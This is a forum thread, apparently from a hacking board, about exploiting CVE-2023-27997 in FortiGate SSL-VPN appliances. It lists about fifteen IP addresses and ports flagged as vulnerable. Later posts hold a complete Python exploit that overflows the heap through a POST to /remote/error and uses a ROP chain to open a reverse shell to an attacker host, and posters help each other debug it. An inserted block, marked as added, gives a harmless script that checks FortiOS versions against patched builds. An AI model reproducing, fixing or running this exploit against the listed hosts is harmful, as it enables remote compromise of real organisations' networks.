
FortiOS & FortiProxy - Heap buffer overflow in sslvpn pre-authentication

владимиродин (RAID-массив, User; registered 28.10.2021; 80 posts; 12 reactions)

Summary

We are actively monitoring CVE-2023-27997, a critical vulnerability affecting FortiGate SSL-VPN appliances. Exploitation of this vulnerability could result in remote code execution (RCE). This vulnerability patch was discovered by a French cybersecurity company, Olympe Cyberdefense; an advisory from Fortinet has not been released yet. FortiOS versions 7.0.12, 7.2.5, 6.4.13, and 6.2.15 contain the patch.

https://www.reddit . com/r/msp/comments/147t4cp/our_soc_is_actively_monitoring_cve202327997_a/
https://twitter . com/cfreal_/status/1667852157536616451
 
The researcher has published some exploit information but only for a crash.

 
I checked several devices for this vulnerability, but I can't be bothered to deal with it now. Maybe it'll be useful to someone:
Checking https://50.237.110.82:443
Vulnerable

Checking https://208.186.31.170:444
Vulnerable

Checking https://98.179.241.44:4433
Vulnerable

Checking https://184.177.112.114:10443
Vulnerable

Checking https://74.62.224.178:443
WARNING: Low confidence results.
Vulnerable

Checking https://84.14.220.190:443
Vulnerable

Checking https://193.252.213.5:10443
Vulnerable

Checking https://37.18.166.107:10443
Vulnerable

Checking https://84.14.220.188:443
Vulnerable

Checking https://84.14.220.190:443
Vulnerable

Checking https://90.115.101.105:10443
Vulnerable

Checking https://78.94.232.219:4443
Vulnerable

Checking https://46.24.200.225:10443
WARNING: Low confidence results.
Vulnerable

Checking https://93.41.218.228:443
Vulnerable

Checking https://93.149.28.122:8443
WARNING: Low confidence results.
Vulnerable
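Added example, not from the thread or from any of its posters: a small Python helper that compares FortiOS version strings from an asset inventory against the fixed builds the summary above lists (7.0.12, 7.2.5, 6.4.13, 6.2.15). Branches the summary does not mention (for example 7.4 or 6.0) are reported as unknown rather than guessed, because the thread says nothing about them; the hostnames and versions in the sample inventory are constructed.

```python
"""Triage FortiOS version strings against the fixed builds listed in the
thread summary for CVE-2023-27997. Added example, not code from the thread."""
import re
from typing import Dict, Iterable, List, Optional, Tuple

# Minimum patched build per release branch, taken from the summary above.
# Branches not listed here are unknown to this script (assumption: no claim
# is made about them either way).
FIXED_BUILDS: Dict[Tuple[int, int], Tuple[int, int, int]] = {
    (7, 2): (7, 2, 5),
    (7, 0): (7, 0, 12),
    (6, 4): (6, 4, 13),
    (6, 2): (6, 2, 15),
}

# Accepts '7.0.11', 'v7.2.4' or '6.4.12 build2571' style strings.
_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:[^\d].*)?$")


def parse_version(text: str) -> Tuple[int, int, int]:
    """Return (major, minor, patch) for a FortiOS version string."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised FortiOS version: {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_patched(text: str) -> Optional[bool]:
    """True if the build is at or above the fixed build for its branch,
    False if it is below it, None if the branch is not covered above."""
    major, minor, patch = parse_version(text)
    fixed = FIXED_BUILDS.get((major, minor))
    if fixed is None:
        return None
    return (major, minor, patch) >= fixed


def triage(inventory: Iterable[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Sort (hostname, version) pairs into patched / vulnerable / unknown."""
    out: Dict[str, List[str]] = {"patched": [], "vulnerable": [], "unknown": []}
    for host, version in inventory:
        state = is_patched(version)
        if state is None:
            out["unknown"].append(host)
        elif state:
            out["patched"].append(host)
        else:
            out["vulnerable"].append(host)
    return out


if __name__ == "__main__":
    # Constructed sample inventory; these are not real hosts.
    sample = [
        ("fw-a.example", "7.0.11"),
        ("fw-b.example", "v7.2.5"),
        ("fw-c.example", "6.4.13 build2571"),
        ("fw-d.example", "7.4.0"),
    ]
    for bucket, hosts in triage(sample).items():
        print(f"{bucket}: {', '.join(hosts) or '-'}")
```

The "unknown" bucket is deliberate: a version that is not in a listed branch is neither cleared nor flagged, so that hosts on branches the summary does not cover get looked at by a person instead of being silently marked safe.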
 
Please note that this user is banned.

A patch has been released for it, but still lots of machines are in danger. What's your newest update about this?
 
I checked several devices for this vulnerability, but now I'm too lazy to do it. Might be useful for someone:
So you have tried penetrating them with the exploit, is that so?
 
but I can't be bothered to deal with it now
well of course, good for you )
I checked several devices for this vulnerability
please tell me which exploit
 
Code:
/home/kali/Desktop/44343/n/fo1.py:8: DeprecationWarning: ssl.SSLContext() without protocol argument is deprecated.
  context = ssl.SSLContext()
/home/kali/Desktop/44343/n/fo1.py:8: DeprecationWarning: ssl.PROTOCOL_TLS is deprecated
  context = ssl.SSLContext()
Exception occurred :TypeError("can't concat str to bytes")

in kali with
└─$ python -V
Python 3.11.2
 
tosend = b"POST /remote/error HTTP/1.1\r\nHost: "+target_host.encode() +b"\r\nContent-Length: 115964117980\r\n\r\n" + payload # i'm fuckn skidie
 
pepel, what encoding: ascii, utf-8? I tested your modified line, and it didn't work.

head cve.py | tail -2

target_host = sys.argv[1].encode()
target_port = sys.argv[2].encode()

  1. What Python version
  2. What OS version
  to run this python script?
Python:
import socket
import ssl
from pwn import *
import time
import sys
import requests

context = ssl.SSLContext()
target_host = sys.argv[1]
target_port = sys.argv[2]
reverse = sys.argv[3]
params = sys.argv[4].split(" ")
strparams = "["
for param in params:
    strparams += "'"+param+"',"
strparams = strparams[:-1]
strparams += "]"

#binary functions
execve = p64(0x0042e050)
#binary gadgets
movrdirax = p64(0x00000000019d2196)# : mov rdi, rax ; call r13
poprsi = p64(0x000000000042f0f8)# : pop rsi ; ret)
poprdx = p64(0x000000000042f4a5)# : pop rdx ; ret)
jmprax = p64(0x0000000000433181)#: jmp rax)
pops = p64(0x000000000165cfd7)# : pop rdx ; pop rbx ; pop r12 ; pop r13 ; pop rbp ; ret)
poprax = p64(0x00000000004359af)# : pop rax ; ret)
gadget1 = p64(0x0000000001697e0d); #0x0000000001697e0d : push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret
poprdi = p64(0x000000000042ed7e)# : pop rdi ; ret
rax3 = gadget1



#hardcoded value which would probably need to be bruteforced or leaked
hardcoded = 0x00007fc5f128e000

scbase = p64(hardcoded)
rdi = p64(hardcoded + 0xc48)
cmd = p64(hardcoded + 0xd38)
asdf = hardcoded + 0xd38
cmd1 = p64(asdf)
cmd2 = p64(asdf+16)
arg1 = p64(asdf+48)
arg2 = p64(asdf+56)
arg3 = p64(asdf+64)

ropchain = poprax
ropchain += execve
ropchain += poprdi
ropchain += cmd1
ropchain += poprsi
ropchain += cmd2
ropchain += poprdx
ropchain += p64(0)
ropchain += jmprax
ropchain += b"/bin/python\x00\x00\x00\x00\x00"
ropchain += arg1
ropchain += arg2
ropchain += arg3
ropchain += p64(0)
ropchain += b"python\x00\x00"
ropchain += b"-c\x00\x00\x00\x00\x00\x00"
ropchain += b"""import socket,sys,os\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(('"""+ reverse.encode() + b"""',31337))\n[os.dup2(s.fileno(),x) for x in range(3)]\ni=os.fork()\nif i==0:\n os.execve('/bin/sh', """+strparams.encode()+b""",{})\n\x00\x00"""

try:
    with socket.create_connection((target_host, int(target_port,10))) as sock:
        with context.wrap_socket(sock, server_hostname=target_host) as ssock:
            ssock.settimeout(2)
            context.verify_mode = ssl.CERT_NONE
            payload = b"A"*173096+rdi+poprdi+cmd+pops+b"A"*40+pops+rax3+b"C"*32+ropchain
            tosend = b"POST /remote/error HTTP/1.1\r\nHost: "+target_host +b"\r\nContent-Length: 115964117980\r\n\r\n" + payload
            ssock.sendall(tosend)
            r = ssock.recv(10024)
except Exception as e:
    print("Exception occurred :"+ repr(e))
 
target_host.encode() and it all works fine. The other messages with DeprecationWarning are just warnings; you can disable them by adding this at the beginning of the file:
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
Python 3.11
OS any
 
pepel, what encoding: ascii, utf-8?
Hey man, have you tested the exploit successfully?
 
No, i'm too lazy for that 🙂
 
pepel, what encoding: ascii, utf-8?
cve-2022-42475 exploit code

ivan231 https://github.com/Amir-hy/cve-2022-42475/blob/main/cve-2022-42475.py of course it doesn't work )
 
The researcher has published some exploit information but only for a crash.

Yeah, not the complete code ;) I'm also looking for the mysterious guy who has the exploit. Lol
 